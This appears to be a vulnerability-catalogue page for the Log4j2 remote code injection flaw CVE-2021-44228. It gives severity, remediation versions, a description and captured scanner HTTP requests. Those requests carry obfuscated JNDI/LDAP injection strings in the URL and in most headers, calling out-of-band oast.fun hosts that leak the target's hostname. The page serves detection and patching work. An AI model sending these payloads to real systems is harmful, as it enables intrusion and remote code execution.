🔙 목록으로 돌아가기

CVE-2021-44228: Apache Log4j2 Remote Code Injection

TitleApache Log4j2 Remote Code Injection
Authormelbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea,j4vaovo
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to remote code execution, potentially compromising the affected system.
RemediationUpgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
CVSS Score10
EPSS Score0.94358
CVE IDCVE-2021-44228
CWE IDCWE-20,CWE-917
Tags cve2021 cve rce oast log4j injection kev apache vkev vuln

🔍 Vulnerability Description

Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

🌐 HTTP Request

GET /?x=${jndi:ldap://${:-218}${:-949}.${hostName}.uri.d5jo9k9le0o1j51t3t4gch757x9j44g56.oast.fun/a} HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Connection: close
Accept-Encoding: gzip
GET / HTTP/1.1
Host: www.victim.com
User-Agent: ${jndi:ldap://${:-218}${:-949}.${hostName}.useragent.d5jo9k9le0o1j51t3t4g56t34kyx6731f.oast.fun}
Connection: close
Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-218}${:-949}.${hostName}.accept.d5jo9k9le0o1j51t3t4gbqyj7zdbk14bd.oast.fun}
Accept-Encoding: ${jndi:ldap://${:-218}${:-949}.${hostName}.acceptencoding.d5jo9k9le0o1j51t3t4gi5bcm6c1mjhfx.oast.fun}
Accept-Language: ${jndi:ldap://${:-218}${:-949}.${hostName}.acceptlanguage.d5jo9k9le0o1j51t3t4g6xny1kmgac3a5.oast.fun}
Access-Control-Request-Headers: ${jndi:ldap://${:-218}${:-949}.${hostName}.accesscontrolrequestheaders.d5jo9k9le0o1j51t3t4gdrst9sqq6mir3.oast.fun}
Access-Control-Request-Method: ${jndi:ldap://${:-218}${:-949}.${hostName}.accesscontrolrequestmethod.d5jo9k9le0o1j51t3t4gf7ww6kyqgryih.oast.fun}
Authentication: Bearer ${jndi:ldap://${:-218}${:-949}.${hostName}.authenticationbearer.d5jo9k9le0o1j51t3t4gjztfm7pkt6kws.oast.fun}
Cookie: ${jndi:ldap://${:-218}${:-949}.${hostName}.cookiename.d5jo9k9le0o1j51t3t4gh477xbmkuzo9k.oast.fun}=${jndi:ldap://${:-218}${:-949}.${hostName}.cookievalue.d5jo9k9le0o1j51t3t4gn5r6ouz1mgkot.oast.fun}
Location: ${jndi:ldap://${:-218}${:-949}.${hostName}.location.d5jo9k9le0o1j51t3t4geoguy1akqmz1j.oast.fun}
Origin: ${jndi:ldap://${:-218}${:-949}.${hostName}.origin.d5jo9k9le0o1j51t3t4g5yh9557ij8mbo.oast.fun}
Referer: ${jndi:ldap://${:-218}${:-949}.${hostName}.referer.d5jo9k9le0o1j51t3t4gz8egbmf4ooro4.oast.fun}
Upgrade-Insecure-Requests: ${jndi:ldap://${:-218}${:-949}.${hostName}.upgradeinsecurerequests.d5jo9k9le0o1j51t3t4gffem4xfpjxb9o.oast.fun}
X-Api-Version: ${jndi:ldap://${:-218}${:-949}.${hostName}.xapiversion.d5jo9k9le0o1j51t3t4gkmw8fqcbekek9.oast.fun}
X-CSRF-Token: ${jndi:ldap://${:-218}${:-949}.${hostName}.xcsrftoken.d5jo9k9le0o1j51t3t4guowph8ahaegyy.oast.fun}
X-Druid-Comment: ${jndi:ldap://${:-218}${:-949}.${hostName}.xdruidcomment.d5jo9k9le0o1j51t3t4gfjtq7r4zecnhz.oast.fun}
X-Forwarded-For: ${jndi:ldap://${:-218}${:-949}.${hostName}.xforwardedfor.d5jo9k9le0o1j51t3t4g4s6npwh5hsxp3.oast.fun}
X-Origin: ${jndi:ldap://${:-218}${:-949}.${hostName}.xorigin.d5jo9k9le0o1j51t3t4g4t39x1rqqs7ye.oast.fun}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-44228.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-44228.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A